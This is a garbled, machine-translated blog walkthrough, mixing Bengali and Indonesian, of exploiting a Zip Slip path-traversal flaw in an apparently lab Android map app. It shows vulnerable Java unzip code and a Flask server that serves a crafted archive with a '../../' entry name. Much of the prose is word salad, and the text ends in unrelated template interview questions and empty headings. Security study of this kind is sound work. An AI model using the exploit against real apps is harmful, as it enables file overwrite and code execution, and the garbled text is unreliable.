পূর্বে অপ্রকাশিত ত্রুটি হ্যাকারদের নির্দোষ চেহারার ফাইলগুলির মাধ্যমে লক্ষ লক্ষ সিস্টেম হাইজ্যাক করতে দেয়

ZIP SLIP দুর্বলতা কি?

জিপ স্লিপ একটি গুরুতর দুর্বলতা যা আর্কাইভ নিষ্কাশন প্রক্রিয়ায় ব্যাপক, আক্রমণকারীদের সিস্টেমে যেকোনো ফাইল লিখতে দেয়। সাধারণত, এর ফলে RCE (রিমোট কোড এক্সিকিউশন) হয়। 5 জুন, 2018-এ প্রকাশের আগে Snyk সিকিউরিটি টিম দ্বারা দুর্বলতাটি আবিষ্কৃত এবং দায়িত্বের সাথে প্রকাশ করা হয়েছিল৷ সমস্যাটি HP, Amazon, Apache, Pivotal এবং আরও অনেকের মতো বড় কোম্পানিগুলির মালিকানাধীন সহ হাজার হাজার প্রকল্পকে প্রভাবিত করে৷

জিপ স্লিপকে বিশেষভাবে তৈরি করা আর্কাইভের মাধ্যমে ব্যবহার করা হয় ফাইলের নামের সাথে যাতে ডিরেক্টরি ট্রাভার্সাল (eg, ../../evil.sh) অন্তর্ভুক্ত থাকে। এই দুর্বলতা অনেক আর্কাইভ ফরম্যাটে ঘটতে পারে, যেমন tar, ghz, jar, war, cpio, apk, rar, এবং 7z।

এই দুর্বলতার মূল হল ডিরেক্টরি ট্রাভার্সাল, যেখানে একজন আক্রমণকারী লক্ষ্য ফোল্ডারের বাইরে সিস্টেম ফাইলগুলির অংশগুলি অ্যাক্সেস করতে পারে। আক্রমণকারী তখন এক্সিকিউটেবল ফাইলটিকে ওভাররাইড করতে পারে এবং এটিকে দূরবর্তীভাবে চালাতে পারে, অথবা সিস্টেম বা ব্যবহারকারীর ফাইলটি কল করার জন্য অপেক্ষা করতে পারে, যাতে তারা শিকারের মেশিনে কমান্ড চালাতে পারে। এছাড়াও, এই দুর্বলতা কনফিগারেশন ফাইল বা অন্যান্য সংবেদনশীল সংস্থানগুলি ওভাররাইট করে ক্ষতির কারণ হতে পারে এবং ব্যবহারকারীর মেশিন এবং সার্ভারে উভয়ই শোষিত হতে পারে।

কীভাবে জিপ স্লিপ ব্যবহার করবেন

জিপ স্লিপ দূর্বলতা ব্যবহার করার জন্য কল করুন এই অ্যান্ড্রয়েডের জন্য ব্যবহার করার জন্য ব্যবহার করার জন্য ব্যবহার করার জন্য ব্যবহার করা যেতে পারে।

Google Maps-এর জন্য অ্যাপলিকেশনের জন্য বেছে নেওয়া হয়েছে স্থানীয় মানচিত্রগুলি ডাউনলোড করার জন্য রিসোর্স বাটনে ক্লিক করুন + ডি লেয়ার।

Tetapi sebelum kita analysis Flow dari cara kerja apk ini kita harus memakai apk Burpsuite. Untuk yang belum tau apk Burpsuite adalah applikasi yang digunakan untuk menguji kemanan applicasi web dan mobile. আলত ini berfungsi untuk mendeteksi kerentanan, menganalisis, dan mengatasi masalah kemanan .

আপনি এই লিঙ্কে ক্লিক করার জন্য টুল ডাউনলোড করতে পারেন:

https://portswigger.net/burp/communitydownload

Berikut adalah hasil intercept ketika kita mau menambahkan maps nya, dan bisa di analysis kalau apk ini rentan karena permintaan API nya masih memakai protocol HTTP টিডাক মেঙ্গগুনাকান HTTPS yang dimana memungkinkan অ্যাটাকার ট্রাফিক ট্রাফিকের জন্য তারপরে,তাপী জুগ ম্যানিপুলেট/মেমোডিফিকেশনের অনুরোধ এবং সাড়া ক্লিয়ারটেক্সট

Dan Fakta nya bahwa ketika masih memakai HTTP dapat membuka seluruh এলাকায় permukaan serangan, Contohnya jenis serangan yang sedang kita buat ini.

Bisa dilihat juga menggunakan Tools JADX untuk melakukan reverse Engineering yang dimana kita bisa melakukan static analysis pada sebuah aplikasi memungkinkan penyerang untuk memahami struktur dan logika aplikasi.

network_security_config.xml এপ্লিকেশন ফাইলের বিশ্লেষণের জন্য সেট করুন cleartextTrafficPermitted="true" । Sehingga konfigurasi ini mengizinkan clear text ট্রাফিক di setiap permintaan untuk domain yang diizinkan. টেটাপি অ্যাপাক ডোমেন ini benar-benar digunakan untuk CleartextTraffic tersebut. Bisa saja ini dibuat hanya untuk pengujian / tidak digunakan dalam production.

ini adalah Hasil intercept ketika kita mendownload মানচিত্র nya yang dimana dia mengambil file ZIP dengan format .ghz

ড্যান মেনকোবা ফাইল ডাউনলোড করুন .GHz সেকার ম্যানুয়াল ডেনগান কপাস ডি ল্যাপটপ। জিপ টারসেবুট আইএসআই ফাইল তৈরি করুন।

Untuk mengetahui lokasi data yang di unzip oleh aplikasi kita bisa gunakan কমান্ড find / | grep australia oceania_nauru.map di adb শেল মোবাইল এমুলেটর nya dan pastikan juga kalau kita sudah memiliki akses root di emulatornya.

Bisa dilihat kalau path file yang di unzip ada di :

/data/media/0/Android/data/io.hextree.pocketmaps/files/Download/pocketmaps/maps/

Ini juga menunjukkan Kepada kita bahwa aplikasi benar-benar meng-unzip ফাইল ম্যাপ nya.

দুর্বলতা বিশ্লেষণ পর্যায়

আমার কিতা লিখতে লিখতে লিখতে হবে সালিসী ফাইলের জন্য দুর্বলতা ডালম অ্যাপলিকেশন, সেপারটি ইয়াং সুডাহ কিতা কেতাহুই ইস্যু এবং জিপ ম্যাপ হ্যান্ডলিং ফাইল করার জন্য। স্থির বিশ্লেষণের জন্য আপনার কীওয়ার্ড: ZipEntry এবং মেনগেটাহুই ক্লাস কোড কোন মেং-হ্যান্ডেল ফাইল জিপ মানচিত্র.

Sebelum kita বিশ্লেষণ লেবিহ ডালাম কোড nya, Saa akan mengikuti panduan dari snyk team untuk mencari kode yang sering diimplementasi tetapi rentan. বেরিকুত আদালাহ সালাহ সাতু পান্ডুয়ান ইয়াং খুসুস অন্টুক বাহাসা জাভা, বিসা বাকা লেবিহ লানজুত: https://github.com/snyk/zip-slip-vulnerability

পেঞ্জেলাসন:

কোড বেরিকুট ভাড়া তেরহাদপ সেরাঙ্গন জিপ স্লিপ কারেন টিডাক মেলাকুকান বৈধতাসি ইয়াং মেমাদাই তেরহাদপ জালুর ফাইল ডালাম আরসিপ জিপ সেবেলাম মেঙ্গেকস্ট্রাকনিয়া। sini, e.getName() ফাইলের নাম ফাইলের সাথে সম্পর্কিত জালুর রিলাটিফ ইয়াং বারবাহায়া, সেপারটি ../../malicious.sh . Ii berarti file tersebut bisa diekstrak di luar destinationDir yang ditentukan.

 InputStream input = zip.getInputStream(e); IOUtils.copy(input, write(f));

সেটেলাহ ফাইল ডিবুআট, কনটেন ফাইল ল্যাংসুং ডিসালিন ট্যানপা মেমেরিকসা জালুর কেলুরান আপাকাহ সুদাহ আমান আতউ টিডাক। Jika jalur tersebut menuju ke lokasi berbahaya, seperti direktori root system atau ফোল্ডার lain yang seharusnya tidak dapat diakses oleh aplikasi, itu bisa Sangat Berbahaya.

Karena kita sudah mengetahui kode yang rentan sesuai panduan mari kita analysis code di apk nya:

পেম্বুতান পথ তানপা ভ্যালিদাসিঃ

 String str3 = file.getAbsolutePath() + File.separator + nextEntry.getName();

আপনি, জলের ফাইল ( str3 ) ডাইরেক্টরির জন্য আপনার পথ নির্দেশ করতে পারেন ( file.getAbsolutePath() ) নাম এন্ট্রি জিপ ( nextEntry.getName() )। নামুন, nextEntry.getName() bisa berisi elemen path berbahaya seperti ../../ , yang dapat menyebabkan file diekstrak di luar direktori yang dimaksud ( file )।

Setelah path dibuat, ফাইল বা ডাইরেক্টরি ডিবুট ল্যাংসুং:

 if (nextEntry.isDirectory()) { new File(str3).mkdir(); } else { e(zipInputStream, str3, eVar, "" + i3 + " Unzipping " + str2, size, null); }

ইনি মেমবুট বা মেনুলিস ফাইল টানপা মেমাস্তিকান বাহওয়া str3 অ্যাডলাহ জলুর ইয়াং আমান।

শোষণ পর্যায়

অটুক দি তাহাপ ইনি সায়া menyiapkan 2 hal untuk পরিবেশ সেরাঙ্গন nya:

1. ডায়নামিক HTTP মকিং এনভায়রনমেন্ট সেটআপ করুন : এক্সটেনশন HTTP মক ড্যারি burpsuite ini dapat mengubah সাড়া জারি করে এপ্লিকেশন করার নিয়ম মেনকোকোকন নিয়মগুলি এবং http history input manual । আপনি আপনাকে নির্দেশ করতে পারেন যে আপনার উত্তরের জন্য আপনাকে URL-এ পুনঃনির্দেশ করতে হবে, HTTP উপহাসের জন্য রিয়েল টাইম ব্যবহার করতে হবে।

   

2. স্থানীয় সার্ভার এনভায়রনমেন্ট সেট-আপ করুন : কারেন সেটআপ অনুরোধটি আপনার কাছে আপনার স্থানীয় সার্ভারকে দূষিত পুনঃনির্দেশ করতে পারে এবং দূষিত জিপ করতে পারে না:

 from flask import Flask, jsonify, send_file import zipfile, io app = Flask(__name__) @app.route('/map.json') def map_json(): response = { "maps-0.13.0_0-path": "maps", "maps-0.13.0_0": [ {"name": "maliciousmaps_USA", "size": "300k", "time": "2025-01"}, ] } return jsonify(response) @app.route('/map.ghz') def map_archive(): # Create a ZipFile object zip_buffer = io.BytesIO() filename = "../../downloads/hax" with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zip_file: content = "You have been hacked" zip_file.writestr(filename, content) zip_buffer.seek(0) return send_file( zip_buffer, mimetype='application/zip', as_attachment=True, download_name='map.ghz' ) if __name__ == '__main__': app.run(debug=True, port=1234)

আপনি কিভাবে সাইবার সিকিউরিটিতে এলেন?

কেন আপনি ডিজিটাল নিরাপত্তা একটি কর্তৃপক্ষ?

এই স্থান আপনার দক্ষতা কি?

সাইবার ক্রাইম ক্রমাগত বিকশিত হচ্ছে। সাইবার ক্রাইমের জগতে নতুন কী আছে যা হ্যাকারনুন সম্প্রদায় ডিজিটাল প্রতারকদের বিরুদ্ধে লড়াইয়ে জানতে পারে?

কোন উদীয়মান সাইবারসিকিউরিটি প্রবণতা বা হুমকি আছে যা পাঠকদের সন্ধান করা উচিত?

ট্রোজান, ম্যালওয়্যার, স্পাইওয়্যার এবং আরও অনেক কিছু। আমাদের প্রিয় পিসিগুলিকে সংক্রামিত করতে এবং আমাদের তথ্য গ্রহণ করতে পারে এমন সাম্প্রতিক বাগগুলির স্কুপ কী? এটা সেখানে থামে না, যদিও; আমাদের জানা যাক অন্যান্য সাইবার কুফল কি আছে!

আপনি কীভাবে অনলাইনে নিজেকে নিরাপদ রাখবেন?

আপনি কীভাবে দুর্বলতার সাথে নতুন প্রযুক্তি নেভিগেট করছেন? স্মার্ট হোমস, এআই, এবং ইন্টারনেট অফ থিংস এর দুর্বলতা রয়েছে।

অতিরিক্ত চিন্তা

উপসংহার